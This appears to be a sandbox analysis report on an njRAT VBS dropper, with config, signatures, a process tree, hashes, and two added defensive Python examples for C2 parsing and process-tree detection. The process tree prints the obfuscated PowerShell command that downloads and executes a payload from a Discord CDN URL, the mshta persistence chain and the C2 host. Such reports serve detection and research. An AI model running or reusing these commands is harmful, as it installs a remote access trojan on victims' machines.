e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

General
Target

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

Filesize

828B

Completed

15-09-2021 08:32

Score
10/10
MD5

9af0d5fbc14e3ac0ae409dfef6e04228

SHA1

931b3139830e5485f198bb72ecba50475e4c8df2

SHA256

e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

Malware Config

Extracted

Family njrat
Version 0.7NC
Botnet NYAN CAT
C2

envirat.duckdns.org:3013

Attributes
reg_key
6de17d5355fa43eca7e
splitter
@!#&^%$
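The extracted splitter is the per-build field separator that njRAT puts between the parts of every C2 message, so it is the one config value that turns into a traffic parser. The following is an added example, not code from the sandbox report or from the njRAT project. It assumes njRAT's commonly documented wire format of "<decimal length>\x00<body>" per message with the body's fields separated by the configured splitter (the report does not state the framing), and the sample stream it parses is constructed here; its command names follow public njRAT 0.7d write-ups and its field layout is illustrative only.

```python
"""
Added example (not part of the sandbox report): frame and split njRAT 0.7-style
C2 traffic using the splitter extracted from this sample.  Assumed, not stated
by the report: one message = "<decimal length>\x00<body>", fields inside the
body separated by the configured splitter.  Sample traffic below is constructed.
"""
import base64
from typing import List, Tuple

SPLITTER = b"@!#&^%$"                            # report: Attributes -> splitter
C2_HOST, C2_PORT = "envirat.duckdns.org", 3013   # report: C2
MAX_PREFIX_DIGITS = 9                            # sanity bound on the length prefix


def frame_messages(buf: bytes) -> Tuple[List[bytes], bytes]:
    """Split a byte stream into complete message bodies; return the unconsumed tail."""
    bodies = []
    while True:
        nul = buf.find(b"\x00", 0, MAX_PREFIX_DIGITS + 1)
        if nul == -1:
            if len(buf) > MAX_PREFIX_DIGITS:
                raise ValueError("no length prefix within %d bytes: %r" % (MAX_PREFIX_DIGITS, buf[:16]))
            break                                # prefix not complete yet
        prefix = buf[:nul]
        if not prefix.isdigit():
            raise ValueError("non-numeric length prefix %r" % prefix)
        start, length = nul + 1, int(prefix)
        if len(buf) < start + length:
            break                                # body still in flight; keep buffering
        bodies.append(buf[start:start + length])
        buf = buf[start + length:]
    return bodies, buf


def split_fields(body: bytes, splitter: bytes = SPLITTER) -> List[str]:
    """Fields are separated by the per-build splitter; decode leniently."""
    return [f.decode("utf-8", "replace") for f in body.split(splitter)]


def parse_stream(buf: bytes, splitter: bytes = SPLITTER):
    bodies, rest = frame_messages(buf)
    return [split_fields(b, splitter) for b in bodies], rest


def build_message(fields: List[str], splitter: bytes = SPLITTER) -> bytes:
    """Inverse of parse_stream; used here only to construct sample traffic."""
    body = splitter.join(f.encode("utf-8") for f in fields)
    return str(len(body)).encode() + b"\x00" + body


# Constructed sample stream: a client check-in ("ll"), a server "inf" request,
# then a third message cut off mid-body, as a receive buffer would see it.
# The victim id is built from the report's botnet name and reg_key for illustration.
VICTIM_ID = base64.b64encode(b"NYAN CAT_6de17d5355fa43eca7e").decode()
SAMPLE_STREAM = (
    build_message(["ll", VICTIM_ID, "DESKTOP-TEST", "Admin", "21-09-15", "", "Win 10", "No", "0.7NC", ".."])
    + build_message(["inf"])
    + b"12\x00CAP@!#&^%$1"
)


def sample_parse():
    """Parse the constructed stream: two complete messages and a partial tail."""
    return parse_stream(SAMPLE_STREAM)


if __name__ == "__main__":
    msgs, rest = sample_parse()
    for m in msgs:
        print(m)
    print("unconsumed:", rest)
```

Feed `frame_messages` the data from a reassembled TCP stream to the C2 and keep the returned tail as the buffer for the next read; the splitter check is what makes a decoder specific to this build, since other njRAT samples use different separators.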
Signatures 9


Discovery
  • njRAT/Bladabindi

    Description

    Widely used RAT written in .NET.

  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    3    | 524 | powershell.exe
  • Drops startup file
    powershell.exe

    Reported IOCs

    description  | ioc                                                                                     | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs | powershell.exe
  • Suspicious use of SetThreadContext
    powershell.exe

    Reported IOCs

    description                         | pid  | process        | target process
    PID 3924 set thread context of 2828 | 3924 | powershell.exe | aspnet_compiler.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). The sandbox's generic text labels this as likely ransomware behaviour; for an njRAT sample it is more consistent with the family's removable-drive spreading option than with encryption.

    TTPs

    System Information Discovery
  • Modifies registry class
    powershell.exe

    Reported IOCs

    description | ioc                                                                                   | process
    Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings | powershell.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, powershell.exe

    Reported IOCs

    pid  | process        | reported
    524  | powershell.exe | 3 times
    3924 | powershell.exe | 3 times
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, powershell.exe, aspnet_compiler.exe

    Reported IOCs

    description                       | pid  | process             | reported
    Token: SeDebugPrivilege           | 524  | powershell.exe      | once
    Token: SeDebugPrivilege           | 3924 | powershell.exe      | once
    Token: SeDebugPrivilege           | 2828 | aspnet_compiler.exe | once
    Token: 33                         | 2828 | aspnet_compiler.exe | 16 times, alternating with the next row
    Token: SeIncBasePriorityPrivilege | 2828 | aspnet_compiler.exe | 16 times

    "Token: 33" is a privilege value the sandbox did not resolve to a name; 33 is SE_INC_WORKING_SET_PRIVILEGE (SeIncreaseWorkingSetPrivilege) in winnt.h. The repeated SeIncBasePriorityPrivilege / 33 pairs come from aspnet_compiler.exe (PID 2828) after PID 3924 wrote to it and set its thread context, that is, from the injected code repeatedly adjusting its own priority rather than from aspnet_compiler.exe's normal behaviour.
  • Suspicious use of WriteProcessMemory
    WScript.exe, powershell.exe, WScript.exe, cmd.exe, mshta.exe, powershell.exe

    Reported IOCs

    description                      | pid  | process        | target process      | reported
    PID 4000 wrote to memory of 524  | 4000 | WScript.exe    | powershell.exe      | 2 times
    PID 524 wrote to memory of 1956  | 524  | powershell.exe | WScript.exe         | 2 times
    PID 1956 wrote to memory of 4076 | 1956 | WScript.exe    | cmd.exe             | 2 times
    PID 4076 wrote to memory of 2832 | 4076 | cmd.exe        | mshta.exe           | 2 times
    PID 2832 wrote to memory of 3924 | 2832 | mshta.exe      | powershell.exe      | 2 times
    PID 3924 wrote to memory of 2828 | 3924 | powershell.exe | aspnet_compiler.exe | 8 times
Processes 7
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    Suspicious use of WriteProcessMemory
    PID:4000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      Blocklisted process makes network request
      Drops startup file
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:524
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          Suspicious use of WriteProcessMemory
          PID:4076
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            Suspicious use of WriteProcessMemory
            PID:2832
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              Suspicious use of SetThreadContext
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              Suspicious use of WriteProcessMemory
              PID:3924
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Suspicious use of AdjustPrivilegeToken
                PID:2828
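The process tree above is the part of this report that transfers directly into detection logic: a script host chain (WScript.exe, cmd.exe, mshta.exe) ending in PowerShell with a case-mangled `-ExecutionPolicy Bypass -WindowStyle Hidden`, a method name assembled from a `[char[]]` array at run time, and a signed .NET utility (aspnet_compiler.exe) started with no arguments and then written to. The following is an added example, not code from the report or from any vendor; it copies the command lines and PIDs from the tree into constructed event tuples so it runs offline, decodes the character-array obfuscation, normalises the PowerShell switches, and flags the parent/child pairs. The `ABBREV` table of PowerShell parameter short forms is a partial, hand-written list, and the `HOLLOW_TARGETS` set is an assumption listing other .NET utilities commonly used the same way.

```python
"""
Added example, not code from the sandbox report: decode the obfuscation in
this sample's PowerShell command line and flag the parent/child pattern the
process tree shows.  Command lines and PIDs are copied from the report; the
event tuples are constructed from it so this runs offline, and ABBREV is a
partial, hand-written table of PowerShell parameter short forms.
"""
import re
from typing import Dict, List, Tuple

# `-join [char[]](68,111,...)` builds a string from character codes at run time
CHAR_JOIN = re.compile(r"-join\s*\[char\[\]\]\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
URL = re.compile(r"""https?://[^\s'"()]+""", re.I)

# PowerShell accepts any unambiguous prefix of a parameter name; common short forms only.
ABBREV = {"-ep": "-executionpolicy", "-exec": "-executionpolicy", "-w": "-windowstyle",
          "-win": "-windowstyle", "-c": "-command", "-e": "-encodedcommand",
          "-ec": "-encodedcommand", "-enc": "-encodedcommand", "-nop": "-noprofile"}
VALUE_FLAGS = {"-executionpolicy", "-windowstyle", "-encodedcommand", "-file"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
# assumption: signed .NET utilities commonly started with no arguments and overwritten
HOLLOW_TARGETS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe"}


def decode_char_joins(cmd: str) -> str:
    """Replace every -join [char[]](...) expression with the string it evaluates to."""
    return CHAR_JOIN.sub(
        lambda m: "".join(chr(int(n)) for n in re.split(r"\s*,\s*", m.group(1))), cmd)


def parse_flags(args: str) -> Dict[str, object]:
    """Case-fold and expand switches; -command consumes the rest of the line."""
    flags: Dict[str, object] = {}
    toks, i = args.split(), 0
    while i < len(toks):
        name = toks[i].lower()
        name = ABBREV.get(name, name)
        if name.startswith("-"):
            if name == "-command":
                flags[name] = " ".join(toks[i + 1:])
                break
            if name in VALUE_FLAGS and i + 1 < len(toks):
                flags[name] = toks[i + 1].lower()
                i += 1
            else:
                flags[name] = True
        i += 1
    return flags


def extract_urls(args: str) -> List[str]:
    """URLs after obfuscation is undone (a char array may also hide the URL itself)."""
    return URL.findall(decode_char_joins(args))


def review_tree(events: List[Tuple[int, int, str, str]]) -> List[str]:
    """events: (pid, ppid, image, arguments).  Returns human-readable findings."""
    image_of = {pid: img.lower() for pid, _, img, _ in events}
    findings = []
    for pid, ppid, img, args in events:
        parent, img_l = image_of.get(ppid, "<unknown>"), img.lower()
        if img_l == "powershell.exe":
            f = parse_flags(args)
            if f.get("-executionpolicy") == "bypass" or str(f.get("-windowstyle", "")).startswith("hid"):
                findings.append(f"pid {pid}: powershell with policy bypass / hidden window, parent {parent}")
            if parent in SCRIPT_HOSTS:
                findings.append(f"pid {pid}: powershell spawned by script host {parent}")
            for u in extract_urls(args):
                findings.append(f"pid {pid}: downloads {u}")
        elif img_l in HOLLOW_TARGETS and parent == "powershell.exe" and not args.strip():
            findings.append(f"pid {pid}: {img} started with no arguments by powershell (hollowing target)")
    return findings


# Process tree from the report as (pid, ppid, image, arguments); the root's parent is not shown there.
PS_524 = ("-noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient)"
          ".(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103))"
          ".Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results")
PS_3924 = r"-ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"
EVENTS = [
    (4000, 0, "WScript.exe", r'"C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"'),
    (524, 4000, "powershell.exe", PS_524),
    (1956, 524, "WScript.exe", r'"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"'),
    (4076, 1956, "cmd.exe", r'/c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "'),
    (2832, 4076, "mshta.exe", r'''vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")'''),
    (3924, 2832, "powershell.exe", PS_3924),
    (2828, 3924, "aspnet_compiler.exe", ""),
]

if __name__ == "__main__":
    print(decode_char_joins(PS_524))
    for line in review_tree(EVENTS):
        print(line)
```

Running it prints the de-obfuscated first-stage command (the character array is `DownloadString`) and one finding per suspicious edge of the tree; the same functions apply to Sysmon event 1 or EDR process-creation records once they are reduced to (pid, ppid, image, arguments).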
Network
MITRE ATT&CK Matrix
Downloads
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5    558a8b7b3fdef4ca79110f8cfd126694
    SHA1   d6e96ca27f701b3f4c24885dacd14c762a9d36b0
    SHA256 38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
    SHA512 37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5    7f85382953fde20b101039d48673dbd2
    SHA1   5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
    SHA256 fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
    SHA512 6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

  • C:\Users\Public\myScript.ps1
    MD5    317f5c7ef5b887966f963c21a60e2889
    SHA1   5078bdb3e7376202c7253a8b428a360e1c047863
    SHA256 cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
    SHA512 e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

  Memory dumps (PID 524, powershell.exe)
  • memory/524-115-0x0000000000000000-mapping.dmp
  • memory/524-121-0x000001ED28FA0000-0x000001ED28FA1000-memory.dmp
  • memory/524-124-0x000001ED28600000-0x000001ED28602000-memory.dmp
  • memory/524-159-0x000001ED28606000-0x000001ED28608000-memory.dmp
  • memory/524-160-0x000001ED29220000-0x000001ED29222000-memory.dmp
  • memory/524-126-0x000001ED28603000-0x000001ED28605000-memory.dmp
  • memory/524-142-0x000001ED29250000-0x000001ED29251000-memory.dmp
  • memory/524-153-0x000001ED29310000-0x000001ED29311000-memory.dmp

  Memory dumps (PID 1956, WScript.exe)
  • memory/1956-177-0x0000000000000000-mapping.dmp

  Memory dumps (PID 2828, aspnet_compiler.exe)
  • memory/2828-211-0x000000000040677E-mapping.dmp
  • memory/2828-218-0x00000000052A0000-0x00000000052A1000-memory.dmp
  • memory/2828-219-0x0000000005150000-0x000000000564E000-memory.dmp
  • memory/2828-217-0x0000000005650000-0x0000000005651000-memory.dmp
  • memory/2828-220-0x0000000005230000-0x0000000005231000-memory.dmp
  • memory/2828-216-0x00000000050B0000-0x00000000050B1000-memory.dmp
  • memory/2828-210-0x0000000000400000-0x000000000040C000-memory.dmp
  • memory/2828-221-0x00000000054C0000-0x00000000054C1000-memory.dmp

  Memory dumps (PID 2832, mshta.exe)
  • memory/2832-181-0x0000000000000000-mapping.dmp

  Memory dumps (PID 3924, powershell.exe)
  • memory/3924-208-0x000001F730CC6000-0x000001F730CC8000-memory.dmp
  • memory/3924-207-0x000001F74B5C0000-0x000001F74B5C5000-memory.dmp
  • memory/3924-202-0x000001F74B5B0000-0x000001F74B5B2000-memory.dmp
  • memory/3924-194-0x000001F730CC0000-0x000001F730CC2000-memory.dmp
  • memory/3924-184-0x0000000000000000-mapping.dmp
  • memory/3924-209-0x000001F74B5D0000-0x000001F74B5D3000-memory.dmp
  • memory/3924-195-0x000001F730CC3000-0x000001F730CC5000-memory.dmp

  Memory dumps (PID 4076, cmd.exe)
  • memory/4076-180-0x0000000000000000-mapping.dmp